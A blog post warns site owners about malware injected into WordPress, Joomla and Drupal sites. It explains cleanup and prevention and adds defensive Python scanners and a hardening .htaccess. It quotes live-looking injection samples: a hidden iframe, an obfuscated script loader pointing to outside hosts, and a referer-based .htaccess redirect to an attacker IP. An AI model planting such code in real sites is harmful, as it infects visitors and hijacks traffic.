If you're using open source software like WordPress, Joomla or Drupal, you may be vulnerable to server-based malware. In the old days, a virus on your Windows PC would seek to destroy files or put up funny messages. These days it's about exploitation for profit. I have come across several incidents of this and just want to warn you in case you come across a WordPress virus or similar. Today, let's talk about a new wave of attack also known as a WordPress virus, Joomla virus or Drupal virus. You'll see why it is happening and how it's done. And for site owners, you'll learn how to resolve it and prevent further attacks. We'll use a WordPress virus as the running example.
Before we start, you may ask why people are doing this. Again, they're not doing it for fun. According to a recent article, one Canadian online pharmacy paid hacking groups to get people to visit its web site and buy drugs online. It's a new form of advertising, if you like. Since they can't get people to the site by legitimate means, the hacking groups get paid to send people there unknowingly.
One of the more recent attacks used Michael Jackson's death as a lure: millions of spam messages were sent out telling people to "click here to find out the truth about Michael Jackson's death". Unsuspecting users would click, and their systems would have a Trojan planted (if they didn't have adequate security). The computer would then be used as a zombie acting for its master.
And this is what I am talking about. If hackers find a way to take over your WordPress blog, they can use it to get more people infected. One of the key reasons this problem is growing is that a lot more people visit and read blogs, so blogs have become a prime target, and WordPress is a popular choice for building them. Similarly, Drupal and Joomla have gained popularity over the years. They're the de facto software of choice for millions of web sites.
How does a WordPress or Joomla virus work? In the strict sense, it's not the typical virus we know that destroys things inside. Instead, the attackers plant code in your blog or web site so that visitors who go there get infected. An example of the code looks like this:
<iframe src="http://drugsforus.cn/in.cgi?income43" width=1 height=1 style="visibility: hidden"></iframe>
A very innocent-looking piece of code. For one thing, you may not see it most of the time. Why? It's small, it doesn't consume much disk space and it's hard to find. In WordPress, you'll see it tagged onto the end of the index.php file. In fact, you may find that every index.php file in each directory and sub-directory has had this line, or something similar, appended. A related attack uses JavaScript. It may look something like this:
var ecov = "pa-v"; document.write(unescape("%3Cscript src='http://eco-safe.com/js/eco.js' type='tex…
The code is simply "obfuscated", meaning the real code is hidden, which makes it even harder for untrained eyes to see. The unescape() call decodes the percent-encoded string (%3C is the < character) into a <script> tag that loads the attacker's script from another site.
Another variant targets the Apache web server. The hacker simply rewrites your .htaccess file. Any time a visitor arrives at your web site from a popular search engine like Google, Yahoo! or AOL, your web server tells the browser to redirect to the attacker's web site. That means your users never even reach your home page: they're simply redirected and then get their computers infected. Of course, if you have antivirus software installed, chances are you will not be infected as easily. If you open your web page and see the status bar showing a web site you're not aware of, your blog or web site may be fetching something from an attacker's site. The rewritten .htaccess looks something like this:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://attackerswebsite/in.html?s=hg_err
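As an added example (not code from the original post), here is a small Python scanner for the three injections shown above: the 1x1 hidden iframe, the document.write(unescape(...)) script loader, and the Referer-conditioned redirect in .htaccess. The file extensions it walks, the signatures themselves and the constructed mini site in demo() are assumptions of this example, not part of the post.

```python
import re
import tempfile
from pathlib import Path

# Signatures drawn from the two injections quoted above: a 1x1 hidden iframe and
# a document.write(unescape("%3Cscript...")) loader that pulls in a remote script.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(?:width=\"?[01]\b|height=\"?[01]\b|visibility:\s*hidden)[^>]*>", re.I)
OBFUSCATED_LOADER = re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)
# The .htaccess variant: a RewriteCond on the Referer header paired with a
# RewriteRule that redirects (flag R) to an absolute http(s) URL.
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I | re.M)
EXTERNAL_REDIRECT = re.compile(
    r"^\s*RewriteRule\s+\S+\s+https?://\S+\s*\[[^\]]*\bR\b[^\]]*\]", re.I | re.M)

def scan_text(name, text):
    """Return [(name, finding), ...] for one file's content; name is the file path."""
    findings = []
    if Path(name).name == ".htaccess":
        if REFERER_COND.search(text) and EXTERNAL_REDIRECT.search(text):
            findings.append((name, "referer-conditioned redirect to external site"))
        return findings
    if HIDDEN_IFRAME.search(text):
        findings.append((name, "hidden iframe"))
    if OBFUSCATED_LOADER.search(text):
        findings.append((name, "document.write(unescape()) script loader"))
    return findings

def scan_tree(root):
    """Walk a site directory and scan every .htaccess, .php, .html and .js file."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and (path.name == ".htaccess" or path.suffix in {".php", ".html", ".js"}):
            findings.extend(scan_text(str(path.relative_to(root)), path.read_text(errors="replace")))
    return findings

def demo():
    """Build a constructed mini site in a temp dir (one clean file, one infected
    index.php, one hijacked .htaccess; hosts are placeholders) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        site = Path(root)
        (site / "wp-admin").mkdir()
        (site / "wp-admin" / "index.php").write_text("<?php echo 'clean'; ?>\n")
        (site / "index.php").write_text(
            "<?php require 'wp-blog-header.php'; ?>\n"
            '<iframe src="http://malware.invalid/in.cgi" width=1 height=1 '
            'style="visibility: hidden"></iframe>\n')
        (site / ".htaccess").write_text(
            "RewriteEngine On\nRewriteCond %{HTTP_REFERER} .*google.*$ [NC]\n"
            "RewriteRule .* http://203.0.113.5/in.html?s=hg [R,L]\n")
        return scan_tree(root)
```

Run scan_tree() against the document root of a site you suspect; a clean WordPress .htaccess (RewriteCond on REQUEST_FILENAME, RewriteRule to /index.php) is not reported because it neither tests the Referer nor redirects off-site.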
If you're a victim of this type of attack, there are usually a few ways it can happen. The FTP transfer log below, from a compromised Joomla site, shows what it looks like:
Tue Aug 04 07:20:45 2009 0 69.119.17.159 8275 /home/websitename/joomlabackups/public_html/index.php a _ o r websitename ftp 1 * c
Tue Aug 04 07:20:52 2009 0 95.208.255.220 8142 /home/websitename/joomlabackups/public_html/index.php a _ i r websitename ftp 1 * c
Tue Aug 04 07:21:06 2009 0 59.99.0.67 4794 /home/websitename/joomlabackups/public_html/index2.php a _ o r websitename ftp 1 * c
Tue Aug 04 07:21:21 2009 3 61.238.83.124 4764 /home/websitename/joomlabackups/public_html/index2.php a _ i r websitename ftp 1 * c
Tue Aug 04 07:21:31 2009 0 87.1.14.42 1040 /home/websitename/joomlabackups/public_html/mainbody.php a _ o r websitename ftp 1 * c
Tue Aug 04 07:21:38 2009 0 85.186.137.64 1130 /home/websitename/joomlabackups/public_html/mainbody.php a _ i r websitename ftp 1 * c
Tue Aug 04 08:37:38 2009 0 81.13.158.169 144 /administrator/components/com_poll/tables/index.html b _ o r websitename ftp 1 * c
Tue Aug 04 08:56:08 2009 0 81.13.158.169 524 /components/com_banners/index.html b _ o r websitename ftp 1 * c
Tue Aug 04 08:58:14 2009 0 81.13.158.169 524 /components/com_contact/index.html b _ o r websitename ftp 1 * c
Tue Aug 04 09:00:00 2009 0 81.13.158.169 144 /components/com_contact/models/index.html b _ o r websitename ftp 1 * c
Tue Aug 04 09:00:35 2009 2 81.13.158.169 261 /components/com_contact/models/index.html b _ i r websitename ftp 1 * c
Tue Aug 04 09:07:41 2009 0 81.13.158.169 524 /components/com_poll/index.html b _ o r websitename ftp 1 * c
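The log above is in xferlog format (one transfer per line, direction 'o' for a file served to the client and 'i' for a file received from it). As an added example, not from the post, the Python below parses such a log and flags the fetch-then-push pattern visible above: a file downloaded and then re-uploaded seconds later, often from a different address. The sample log is constructed with documentation-range addresses; the field layout is the standard xferlog one.

```python
from datetime import datetime

# Constructed sample in xferlog layout (same field order as the FTP log quoted
# above); addresses are from RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG = """\
Tue Aug 04 07:20:45 2009 0 198.51.100.7 8275 /home/site/public_html/index.php a _ o r siteuser ftp 1 * c
Tue Aug 04 07:20:52 2009 0 203.0.113.9 8142 /home/site/public_html/index.php a _ i r siteuser ftp 1 * c
Tue Aug 04 07:21:06 2009 0 192.0.2.33 4794 /home/site/public_html/index2.php a _ o r siteuser ftp 1 * c
Tue Aug 04 07:21:21 2009 3 192.0.2.33 4764 /home/site/public_html/index2.php a _ i r siteuser ftp 1 * c
Tue Aug 04 09:00:00 2009 0 203.0.113.9 144 /components/com_contact/models/index.html b _ o r siteuser ftp 1 * c
"""

def parse_xferlog(text):
    """Split xferlog lines into records. The timestamp is the first five tokens;
    the rest are positional: transfer-time, client IP, size, file, type, special
    action, direction ('o' = served to client, 'i' = received), mode, user, ..."""
    records = []
    for line in text.splitlines():
        t = line.split()
        if len(t) < 18:
            continue  # blank or truncated line
        records.append({
            "time": datetime.strptime(" ".join(t[:5]), "%a %b %d %H:%M:%S %Y"),
            "ip": t[6], "size": int(t[7]), "file": t[8],
            "direction": t[11], "user": t[13],
        })
    return records

def find_modify_cycles(records, window=300):
    """A download of a file followed within `window` seconds by an upload of the
    same file is the fetch-edit-push pattern of an injection done over FTP with
    stolen credentials. Returns (file, download_ip, upload_ip, seconds) tuples."""
    cycles, last_download = [], {}
    for r in sorted(records, key=lambda r: r["time"]):
        if r["direction"] == "o":
            last_download[r["file"]] = r
        elif r["direction"] == "i" and r["file"] in last_download:
            d = last_download[r["file"]]
            delta = int((r["time"] - d["time"]).total_seconds())
            if delta <= window:
                cycles.append((r["file"], d["ip"], r["ip"], delta))
    return cycles

def ips_per_user(records):
    """Distinct client addresses per FTP account. One account driven from many
    addresses in a short span points to credentials that have been shared around."""
    seen = {}
    for r in records:
        seen.setdefault(r["user"], set()).add(r["ip"])
    return {u: sorted(ips) for u, ips in seen.items()}

if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_LOG)
    for cycle in find_modify_cycles(recs):
        print("fetch-then-push of %s: downloaded by %s, uploaded by %s %ds later" % cycle)
    print(ips_per_user(recs))
```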
Now that you understand how this works, what should you do if you get attacked?
Firstly, if you can still log into the backend, inspect the file dates to see which directories or files were tampered with. You can also review the server log (like the one above) for suspicious activity. With the iframe and JavaScript injection methods, you can simply replace the files with the originals from the package you downloaded. For example, with WordPress, download or retrieve a copy of the WordPress software and use FTP to replace the original files (usually the index.php file in the root directory and the wp-admin and wp-includes directories). The reason index.php gets infected is that every visit to your web site triggers or touches this file. If this doesn't work, you may simply have to reinstall the entire blog or web site.
Secondly, change your backend and FTP passwords. Even if you think the hackers exploited your web site over the internet, you should still take this precaution. In the log above, you can see a number of different IP addresses (e.g. 81.13.158.169, 85.186.137.64). The attack is carried out by a number of people or machines. In this instance, the hacker got the login and password, probably through a Trojan, and has probably passed this information on to a number of places and dozens of other hackers. If you want to dig deeper, you can try to trace these IPs using http://www.ip-adress.com/ip_tracer/
Thirdly, do a virus check on your PC. Chances are you still have the Trojan inside, so even if you fix the problem and change your password, it can happen again the next time you type in the password to update your web site. The cycle starts again once the hacker has the new login and password transmitted to them.
Fourthly, check the real damage. If you noticed the attack within hours or minutes, you can simply fix it before much damage is done. If you can't, one of the biggest damages is having your web site blacklisted. Google and Firefox watch for malicious web sites and will redirect users to a warning page once they detect malware on your site. For example, if your web site is hacked and injected with malicious code, internet users who visit your page start getting infected or getting warned by their antivirus software. Some of this information is relayed back to Google, and once Google has had a chance to crawl your page (usually every week), you will be put on a blacklist. To check whether your web site is fine or not, you can go here: http://www.google.com/safebrowsing/diagnostic?site=www.danielpoon.com. If you are blacklisted, you will need to clean up your web site and submit a form to Google, and they'll re-crawl your site before the ban is lifted. Google says it could take a maximum of 90 days. Imagine having your site banned for 90 days. This is why it's important to protect yourself.
One of the most vicious pieces of malware delivered this way is the rootkit, where your computer is totally compromised. To clarify in more detail, you may ask how one line of code can cause all this damage. Well, that line of code isn't the problem in itself. The "iframe" code simply gets the user's browser to load content from another web site; it's that web site that plants the virus. Your WordPress, Drupal or Joomla site simply had one line of code planted to open a window onto these malicious sites. Your web site became their agent.
Fifthly, upgrade your software. WordPress, Drupal and Joomla constantly improve their security in newer versions. If you don't upgrade, you're vulnerable to these attacks. Not to mention that you need to watch out for plugins that may cause problems. I know this is hard, but prefer plugins that are popular and widely used over new plugins that no one has tried before. Then you'll need to learn to harden your .htaccess security. Create .htaccess files that are robust (e.g. don't allow script execution in directories that shouldn't be executing code).
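As an added example of the last point (not from the post), here is an .htaccess for a directory that should only ever hold static files, such as a WordPress uploads directory, so that any script dropped there is refused rather than run. It assumes Apache 2.4 with AllowOverride permitting FileInfo, Limit and Options in that directory; the 2.2 equivalent is noted in the comments.

```apache
# Refuse to serve (and therefore to execute) script files from this directory.
<FilesMatch "\.(php|phtml|php[0-9]|pl|py|cgi|sh)$">
    Require all denied
    # Apache 2.2 equivalent of the line above:
    # Order Deny,Allow
    # Deny from all
</FilesMatch>

# No CGI execution and no directory listings here.
Options -ExecCGI -Indexes
```

Keep the rewrite rules for the site itself in the document root; this file only tightens the one directory it sits in.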
Sixthly, granted, if you have a Trojan there's nothing else you can do (i.e. you cannot simply upgrade your software) because the hackers have your password and can do anything they want. Therefore, change your passwords regularly. This is tough to do but it's a must. At the very minimum, practice doing it once every 6 months.
Seventhly, never download free software from places you don't know. Even though you can get viruses online, you can just as easily plant them yourself. There's a lot of software on Rapidshare that is claimed to be cracked and available for free. Well, hackers cracked that software and also planted their virus inside. One common method is to provide a piece of add-on software called a keygen. When users try to activate the software by opening the keygen, the virus is planted on their computers. And it works the same way as before: if it's a keylogger, your passwords are transmitted.
Eighthly (if there's such a word), never blog or update web sites from an internet cafe. Since the logins for your web sites aren't encrypted, you could easily be tapped.
One Response for "Resolving Wordpress Security, XSS Attack, Joomla Security"
Hi,
One of my websites was hacked and your post is very informative. Thanks for sharing your brain.
Regards,
Sen.